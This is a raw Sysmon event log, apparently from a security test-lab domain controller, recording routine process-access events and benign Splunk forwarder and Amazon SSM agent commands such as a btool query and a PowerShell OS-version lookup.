12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002551Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002550Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-647E-6064-3D00-00000000AE01}37963816C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5A00-00000000AE01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002549Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002548Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002547Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002546Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002545Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002544Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002543Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002542Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-6469-6064-0500-00000000AE01}6241132C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5A00-00000000AE01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002541Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-647F-6064-4E00-00000000AE01}29042688C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{266CAFBE-6481-6064-5A00-00000000AE01}3832C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002540Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.424{266CAFBE-6481-6064-5A00-00000000AE01}3832C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-647F-6064-4E00-00000000AE01}2904C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 11241100x80000000000000002539Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.408{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\Temp\__PSScriptPolicyTest_0kjz5n41.ayo.ps12021-03-31 12:01:05.408 10341000x80000000000000002538Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.393{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002537Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.374{266CAFBE-647E-6064-4800-00000000AE01}40763036C:\Windows\system32\conhost.exe{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002536Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.373{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002535Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.373{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002534Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.373{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002533Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.373{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002532Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.372{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002531Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.372{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002530Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.372{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002529Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.372{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002528Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.372{266CAFBE-646C-6064-0C00-00000000AE01}5921032C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002527Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.372{266CAFBE-6469-6064-0500-00000000AE01}6242352C:\Windows\system32\csrss.exe{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002526Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.371{266CAFBE-647E-6064-4300-00000000AE01}39243892C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002525Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.371{266CAFBE-6481-6064-5900-00000000AE01}4012C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-CimInstance Win32_OperatingSystem" "| Select-Object" "Version, OperatingSystemSKU" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{266CAFBE-646A-6064-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{266CAFBE-647E-6064-4300-00000000AE01}3924C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 23542300x80000000000000002524Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:01:05.355{266CAFBE-647F-6064-5000-00000000AE01}3024NT AUTHORITY\SYSTEMC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 